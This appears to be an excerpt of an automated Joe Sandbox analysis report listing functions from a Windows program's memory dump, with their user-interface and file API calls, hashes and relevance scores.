Opcode Fuzzy Hash: 0a52752a70810c96a10944ad1cad63c03ae3161131a9f20649a1c763d0dad20a
Instruction Fuzzy Hash: 1AA18F31600606EFDF249FA1C880BBEB7A5FF45300F10852EE56A952E3D731EA50EB51

Function 00C078B1 Relevance: 21.3, APIs: 14, Instructions: 268keyboardwindowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 00C0798A
SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 00C079A6
GetCapture.USER32 ref: 00C07A26
GetKeyState.USER32(00000011), ref: 00C07A79
GetKeyState.USER32(00000010), ref: 00C07A86
ImmGetContext.IMM32(?), ref: 00C07A94
ImmGetOpenStatus.IMM32(00000000,?), ref: 00C07AA1
ImmReleaseContext.IMM32(00000000,00000000,?), ref: 00C07AC3
GetFocus.USER32 ref: 00C07AED
IsWindow.USER32(?), ref: 00C07B2E
IsWindow.USER32(?), ref: 00C07BB4
ClientToScreen.USER32(?,?), ref: 00C07BC4
IsWindow.USER32(?), ref: 00C07BEA
ClientToScreen.USER32(?,?), ref: 00C07C19

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Window$ClientContextScreenState$CaptureFocusMessageOpenReleaseSendStatus
String ID:
API String ID: 1155058817-0
Opcode ID: d5b81d625775ba0a2c65ee76d18c54dd1e610be53095fed73aea2ce279ea6e83
Instruction ID: 2d0dea20f6c26a2f08d613cc568077cb2f2d5a3e20eae53150e20c0c1462b025
Opcode Fuzzy Hash: d5b81d625775ba0a2c65ee76d18c54dd1e610be53095fed73aea2ce279ea6e83
Instruction Fuzzy Hash: BD919F71E08606AFDF299BA0C8C4A7DB7A9EF04300F10862AE565965E1D731FF80EB51

Function 00BF0783 Relevance: 21.3, APIs: 14, Instructions: 262windowCOMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(?), ref: 00BF0800
RedrawWindow.USER32(?,00000000,00000000,00000505), ref: 00BF081E
ReleaseCapture.USER32 ref: 00BF0824
SetCapture.USER32(?), ref: 00BF0837
ReleaseCapture.USER32 ref: 00BF08AC
SetCapture.USER32(?), ref: 00BF08BF
SendMessageA.USER32(?,00000362,0000E001,00000000), ref: 00BF0998
UpdateWindow.USER32(?), ref: 00BF09FB
SendMessageA.USER32(?,00000111,000000FF,00000000), ref: 00BF0A43
IsWindow.USER32(?), ref: 00BF0A4E
IsIconic.USER32(?), ref: 00BF0A5B
IsZoomed.USER32(?), ref: 00BF0A68
IsWindow.USER32(?), ref: 00BF0A7C
UpdateWindow.USER32(?), ref: 00BF0AC8

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Window$Capture$MessageReleaseSendUpdate$EmptyIconicRectRedrawZoomed
String ID:
API String ID: 2500574155-0
Opcode ID: 59811665a81b40c8f1bc615bf63a4baac5d25b2fe8096b896a68cdb4dc3e4c84
Instruction ID: e1b13c3a6a7980063094c584786d1023c436cd144531fa3ff7aa2a2b71672bc3
Opcode Fuzzy Hash: 59811665a81b40c8f1bc615bf63a4baac5d25b2fe8096b896a68cdb4dc3e4c84
Instruction Fuzzy Hash: DFA14635610209EFCF11AF65C888AAD7BB6EF44310F1482B9FD1A9F2B2DB719944DB50

Function 00C4B802 Relevance: 16.9, APIs: 11, Instructions: 446COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00C4B884
SetRectEmpty.USER32(?), ref: 00C4B89D
InflateRect.USER32(?,000000FE,00000000), ref: 00C4B8F1
OffsetRect.USER32(?,00000000,00000000), ref: 00C4BAE3
GetSystemMetrics.USER32(00000002), ref: 00C4BB2C
InflateRect.USER32(?,00000000,00000000), ref: 00C4BB55
InflateRect.USER32(?,000000FF,000000FF), ref: 00C4BD22
InvalidateRect.USER32(?,?,00000001), ref: 00C4BD31
GetClientRect.USER32(?,?), ref: 00C4BD4C
InvalidateRect.USER32(?,?,00000001), ref: 00C4BD78
UpdateWindow.USER32(?), ref: 00C4BD81

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$Inflate$ClientInvalidate$EmptyMetricsOffsetSystemUpdateWindow
String ID:
API String ID: 159692204-0
Opcode ID: e8ceabf1c1f0a26caaf9a2b6e8d39e091829f3339aac85a840b7901bfcd3b435
Instruction ID: f26b0199598cd651d390e98eae81fe54927ed480329c2bc5d0497c6a598915d3
Opcode Fuzzy Hash: e8ceabf1c1f0a26caaf9a2b6e8d39e091829f3339aac85a840b7901bfcd3b435
Instruction Fuzzy Hash: 6002E3719006169FCF15DF68C9C8AA977B5FF49300F2841BAEC19AF25ADB30A941DB60

Function 00C1AC46 Relevance: 16.9, APIs: 11, Instructions: 430windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00C1AC98
IsRectEmpty.USER32(?), ref: 00C1ACA2
IsIconic.USER32(?), ref: 00C1ACFD
BeginDeferWindowPos.USER32(00000000), ref: 00C1AD37
GetClientRect.USER32(?,?), ref: 00C1AD61
IsRectEmpty.USER32(?), ref: 00C1AD6B
IsRectEmpty.USER32(?), ref: 00C1AE01
EqualRect.USER32(?,?), ref: 00C1AE46
GetParent.USER32(?), ref: 00C1B042
GetWindowRect.USER32(?,?), ref: 00C1AEED

Part of subcall function 00BD8054: ScreenToClient.USER32(?,?), ref: 00BD8065
Part of subcall function 00BD8054: ScreenToClient.USER32(?,?), ref: 00BD8072

EndDeferWindowPos.USER32(?), ref: 00C1B12E

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$Client$EmptyWindow$DeferScreen$BeginEqualIconicParent
String ID:
API String ID: 3453398311-0
Opcode ID: 158dd4e7a4a454a034b423f131511fd2c72ebfeb7b07ffa040a792ab42561827
Instruction ID: 0f538cb524f23b9eb9f1672845c046b56282bb78f88e0317392692b897d08f49
Opcode Fuzzy Hash: 158dd4e7a4a454a034b423f131511fd2c72ebfeb7b07ffa040a792ab42561827
Instruction Fuzzy Hash: B1F17870A01609DFCF14DFA4C984AEEB7B6BF4A300F144069F816AB255DB70AE85DF51

Function 00C42754 Relevance: 16.7, APIs: 11, Instructions: 220windowkeyboardCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 00C42782
GetFocus.USER32 ref: 00C42790
IsChild.USER32(?,?), ref: 00C427C4
SendMessageA.USER32(?,00000010,00000000,00000000), ref: 00C427F8
IsChild.USER32(?,?), ref: 00C42814
SendMessageA.USER32(?,00000100,?,00000000), ref: 00C42843
IsIconic.USER32(?), ref: 00C42884
GetAsyncKeyState.USER32(00000011), ref: 00C4290A
GetAsyncKeyState.USER32(00000012), ref: 00C4291C
GetAsyncKeyState.USER32(00000010), ref: 00C42929
IsWindowVisible.USER32(?), ref: 00C4298A

Part of subcall function 00C71766: RedrawWindow.USER32(?,00000000,00000000,00000105,00000000), ref: 00C71793

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: AsyncStateWindow$ChildMessageSend$FocusIconicRedrawVisible
String ID:
API String ID: 763474574-0
Opcode ID: c19cb2caa6506a5c9d646c5520c5ac9aa3e196fd22e2af405defe7d9b77e6a1d
Instruction ID: 1a8feca99ea9c5781603ff3643cb5a2eeeed3cbb7403ca7320164660544021bb
Opcode Fuzzy Hash: c19cb2caa6506a5c9d646c5520c5ac9aa3e196fd22e2af405defe7d9b77e6a1d
Instruction Fuzzy Hash: F271B232A00345AFDB209F64CC86BAD7BB5BF14344F4540A9F995EB2A1DB71EE40DB60

Function 00C431E3 Relevance: 16.6, APIs: 11, Instructions: 99windowCOMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000021), ref: 00C43205
GetSystemMetrics.USER32(00000020), ref: 00C4320C
IsIconic.USER32(?), ref: 00C43220
GetWindowRect.USER32(?,00000020), ref: 00C43261
IsIconic.USER32(?), ref: 00C43285
GetSystemMetrics.USER32(00000004), ref: 00C43291
OffsetRect.USER32(00000020,?,?), ref: 00C432A3
GetSystemMetrics.USER32(00000004), ref: 00C432AB
IsIconic.USER32(?), ref: 00C432D9
GetSystemMetrics.USER32(00000021), ref: 00C432E5
GetSystemMetrics.USER32(00000020), ref: 00C432EC

Part of subcall function 00BE240F: GetWindowLongA.USER32(?,000000F0), ref: 00BE241A

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: MetricsSystem$Iconic$RectWindow$LongOffset
String ID:
API String ID: 993849457-0
Opcode ID: ae44f0509aba5e764c689096a21c08c73f9108c678b52b1ee86639784a32ff70
Instruction ID: 37817b93f7bc462c8e89115e55efb64c3367a1b27ba04fb7536ea41b248ebea9
Opcode Fuzzy Hash: ae44f0509aba5e764c689096a21c08c73f9108c678b52b1ee86639784a32ff70
Instruction Fuzzy Hash: 9741F8B1A002499FCF14DFA9C885BAEBBF5FF48300F054469E619EB251DB74AA40CF61

Function 00C434E3 Relevance: 15.1, APIs: 10, Instructions: 146windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00C43509
ScreenToClient.USER32(?,?), ref: 00C43587
GetSystemMetrics.USER32(00000021), ref: 00C43595
GetSystemMetrics.USER32(00000020), ref: 00C4359E
IsIconic.USER32(?), ref: 00C435AC
GetSystemMetrics.USER32(00000004), ref: 00C435B8
PtInRect.USER32(00000000,?,?), ref: 00C435FF
PtInRect.USER32(?,?,?), ref: 00C43628
GetSystemMetrics.USER32(00000004), ref: 00C4363E
PtInRect.USER32(00000020,?,?), ref: 00C43656

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: MetricsSystem$Rect$ClientIconicScreenVisibleWindow
String ID:
API String ID: 1122842830-0
Opcode ID: 8a1d087c208ae126858e50f02d8ccef68299c54153266591476bdc36f56ee41e
Instruction ID: 63f158a4858b388b81b14bff4043ceea308d1f2f428e316fed8cd19c99bb710f
Opcode Fuzzy Hash: 8a1d087c208ae126858e50f02d8ccef68299c54153266591476bdc36f56ee41e
Instruction Fuzzy Hash: C7515971A0064AAFCB10DFA9C884AAEB7B5FF48750F154069F919EB251DB31EF01DB90

Function 00BFE17D Relevance: 15.1, APIs: 10, Instructions: 131filestringCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00BFE187
GetFullPathNameA.KERNEL32(00000000,00000104,?,?,00000158,00BFE360,?,?,00000000,?,00CB107F,?,?,?), ref: 00BFE1C5
__cftof.LIBCMT ref: 00BFE1D9

Part of subcall function 00BD71ED: __CxxThrowException@8.LIBCMT ref: 00BD7203
Part of subcall function 00BD71ED: __EH_prolog3.LIBCMT ref: 00BD7210

PathIsUNCA.SHLWAPI(?,?,?,?,00CB107F,?,?,?), ref: 00BFE241
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,00CB107F,?,?,?), ref: 00BFE268
CharUpperA.USER32(?,?,00CB107F,?,?,?), ref: 00BFE29B
FindFirstFileA.KERNEL32(?,?,?,00CB107F,?,?,?), ref: 00BFE2B7
FindClose.KERNEL32(00000000,?,00CB107F,?,?,?), ref: 00BFE2C3
lstrlenA.KERNEL32(?,?,00CB107F,?,?,?), ref: 00BFE2E1
_strcpy_s.LIBCMT ref: 00BFE305

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3H_prolog3_InformationNameThrowUpperVolume__cftof_strcpy_slstrlen
String ID:
API String ID: 1696414672-0
Opcode ID: ab900486a5248aed16549dbaf5f93a8e31fbcce21cc5a5c9484c5f4c199ebbee
Instruction ID: b667939bed35a67c48c58e7af6ea70e0d74598aab3490eb13713bb072ed35c36
Opcode Fuzzy Hash: ab900486a5248aed16549dbaf5f93a8e31fbcce21cc5a5c9484c5f4c199ebbee
Instruction Fuzzy Hash: 7841B1718001599BDF21AB60CC89BFEB7A8EF50315F0005D9B519AA2A1EB349E888E61

Function 00C72138 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00C7216E

Part of subcall function 00C71ABB: GetParent.USER32(?), ref: 00C71AD1
Part of subcall function 00C71ABB: GetSystemMenu.USER32(?,00000000,?,00000000,?,?,?,00C72191,?), ref: 00C71AF0
Part of subcall function 00C71ABB: SetMenuDefaultItem.USER32(?,0000F060,00000000,00000000,?,?,?,00C72191,?), ref: 00C71B19
Part of subcall function 00C71ABB: GetParent.USER32(?), ref: 00C71B22
Part of subcall function 00C71ABB: IsZoomed.USER32(?), ref: 00C71B2D
Part of subcall function 00C71ABB: EnableMenuItem.USER32(?,0000F000,00000003), ref: 00C71B47
Part of subcall function 00C71ABB: EnableMenuItem.USER32(?,0000F010,00000003), ref: 00C71B53
Part of subcall function 00C71ABB: EnableMenuItem.USER32(?,0000F030,00000003), ref: 00C71B5F
Part of subcall function 00C71ABB: EnableMenuItem.USER32(?,0000F030,00000000), ref: 00C71B96
Part of subcall function 00C71ABB: GetParent.USER32(?), ref: 00C71B9E
Part of subcall function 00C71ABB: DeleteMenu.USER32(?,0000F120,00000000,00000000,?,?,?,00C72191,?), ref: 00C71BC4
Part of subcall function 00C71ABB: DeleteMenu.USER32(?,0000F030,00000000,?,?,?,00C72191,?), ref: 00C71BD0
Part of subcall function 00C71ABB: GetParent.USER32(?), ref: 00C71BD8
Part of subcall function 00C71ABB: DeleteMenu.USER32(?,0000F020,00000000,00000000,?,?,?,00C72191,?), ref: 00C71BF8
Part of subcall function 00C71ABB: GetParent.USER32(?), ref: 00C71C0A

Strings

y, xrefs: 00C721AF

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Menu$ItemParent$Enable$Delete$DefaultRectSystemWindowZoomed
String ID: y
API String ID: 540879578-4225443349
Opcode ID: a05f643be094972c89b3aebe14b471e03ab7c8b9ad415e10a9259e99d5540824
Instruction ID: 541bdb2f1a49ceb6474bbdafe3b208a23fa59e291b6728b22d0cb1f832f844a2
Opcode Fuzzy Hash: a05f643be094972c89b3aebe14b471e03ab7c8b9ad415e10a9259e99d5540824
Instruction Fuzzy Hash: 0431F1729002049FCF20DF69C885BAD77F4BB58311F50C46AE93AEB152C6708F41DB51

Function 00CC2117 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00BE33C1: __EH_prolog3_catch.LIBCMT ref: 00BE33C8

GetUserDefaultUILanguage.KERNEL32(00000000,00000005,00CC20F8,00000000,?,?,00CAC8A9,00000000,?,00CACC44,0000001C,00CAC9D7,00000000,00CACC44), ref: 00CC215F
FindResourceExW.KERNEL32(00000000,00000005,?,0000FC11,?,?,00CAC8A9,00000000,?,00CACC44,0000001C,00CAC9D7,00000000,00CACC44), ref: 00CC219D
FindResourceW.KERNEL32(00000000,?,00000005,?,?,00CAC8A9,00000000,?,00CACC44,0000001C,00CAC9D7,00000000,00CACC44), ref: 00CC21B6
LoadResource.KERNEL32(00000000,00000000,?,?,00CAC8A9,00000000,?,00CACC44,0000001C,00CAC9D7,00000000,00CACC44), ref: 00CC21C4
GlobalAlloc.KERNEL32(00000040,00000000,00000005,00CC20F8,00000000,?,?,00CAC8A9,00000000,?,00CACC44,0000001C,00CAC9D7,00000000,00CACC44), ref: 00CC21F4

Part of subcall function 00BD71ED: __CxxThrowException@8.LIBCMT ref: 00BD7203
Part of subcall function 00BD71ED: __EH_prolog3.LIBCMT ref: 00BD7210

Strings

MS UI Gothic, xrefs: 00CC2179

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Resource$Find$AllocDefaultException@8GlobalH_prolog3H_prolog3_catchLanguageLoadThrowUser
String ID: MS UI Gothic
API String ID: 2010067809-1905310704
Opcode ID: 5b542a3c42bb41d9f4bcb54d0cbc337934889485603351ead888de7169d2a41f
Instruction ID: 7be097f6625aa5bd96275adceb841bb37908fece881af22dd1bfd50c279d703f
Opcode Fuzzy Hash: 5b542a3c42bb41d9f4bcb54d0cbc337934889485603351ead888de7169d2a41f
Instruction Fuzzy Hash: D331D475A00201AFDB116F25CC86FAEB7A9EF40710B088069FD159F3A1EF31DE41D660

Function 00C3E447 Relevance: 9.4, APIs: 6, Instructions: 383COMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(?), ref: 00C3E47D
SetRectEmpty.USER32(?), ref: 00C3E486
InflateRect.USER32(?), ref: 00C3E568

Part of subcall function 00C3D3AB: __EH_prolog3_GS.LIBCMT ref: 00C3D3B5
Part of subcall function 00C3D3AB: InflateRect.USER32(000000FE,000000FD,00000000), ref: 00C3D428

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$EmptyInflate$H_prolog3_
String ID:
API String ID: 3226488205-0
Opcode ID: e9a333e60fe3b6086e96a6be025f5d2923ce8c607c3298568f8c587c1b3fe597
Instruction ID: 1309a7bc566de90d50b388cd93010218df0ea50e892e41cbe08c201919e089f5
Opcode Fuzzy Hash: e9a333e60fe3b6086e96a6be025f5d2923ce8c607c3298568f8c587c1b3fe597
Instruction Fuzzy Hash: 19D14971910608DFCF16DF68C885AEE77B6EF49310F284269F825AB185EB30AA45CF51

Function 00C000A4 Relevance: 9.1, APIs: 6, Instructions: 116keyboardwindowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,00000362,0000E002,00000000), ref: 00C00126
UpdateWindow.USER32(?), ref: 00C0013D
GetKeyState.USER32(00000079), ref: 00C00162
GetKeyState.USER32(00000012), ref: 00C0016F
GetParent.USER32(?), ref: 00C00225
PostMessageA.USER32(?,0000036A,00000000,00000000), ref: 00C00241

Part of subcall function 00BD71ED: __CxxThrowException@8.LIBCMT ref: 00BD7203
Part of subcall function 00BD71ED: __EH_prolog3.LIBCMT ref: 00BD7210

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: MessageState$Exception@8H_prolog3ParentPostSendThrowUpdateWindow
String ID:
API String ID: 2390574533-0
Opcode ID: 4dd93ebf71569eec563ae04cf8d174d58f0c4b38c3822e1c08e2095d02b59d68
Instruction ID: b95efa639b7dd7bcb02f4882b8cd5bd2b9115ea62a7b27da24f547d1c2d32414
Opcode Fuzzy Hash: 4dd93ebf71569eec563ae04cf8d174d58f0c4b38c3822e1c08e2095d02b59d68
Instruction Fuzzy Hash: 2041C171600745DFEB309B20CC48FAEB7E5BF50754F324528E4AA5B2D2DBB4AA80DB10

Function 00BD3B3A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

_strcpy_s.LIBCMT ref: 00BD3B6C

Part of subcall function 00CC74FC: __getptd_noexit.LIBCMT ref: 00CC74FC

GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 00BD3B84
__snwprintf_s.LIBCMT ref: 00BD3BB9
LoadLibraryA.KERNEL32(?), ref: 00BD3BF4

Strings

LOC, xrefs: 00BD3B64

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: InfoLibraryLoadLocale__getptd_noexit__snwprintf_s_strcpy_s
String ID: LOC
API String ID: 1155623865-519433814
Opcode ID: 14c9738afbb23c4aeadb2af76ce0ad4fe2476f503c0019885db1fe05194d90f5
Instruction ID: 908d5bae6623e9324597b96f6e74391a8451355216397d36456f18f88d2b6de0
Opcode Fuzzy Hash: 14c9738afbb23c4aeadb2af76ce0ad4fe2476f503c0019885db1fe05194d90f5
Instruction Fuzzy Hash: 18212B70600208BFD715B764CC47FF97BE8DB00B50F0001E7F20597192EA719E419E92

Function 00C2A0A1 Relevance: 7.6, APIs: 5, Instructions: 86keyboardwindowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00C2A0D5
GetKeyState.USER32(00000012), ref: 00C2A107
GetKeyState.USER32(00000011), ref: 00C2A110
SendMessageA.USER32(?,00000157,00000000,00000000), ref: 00C2A129
SendMessageA.USER32(?,0000014F,00000001,00000000), ref: 00C2A13A

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: MessageSendState$Parent
String ID:
API String ID: 1284845784-0
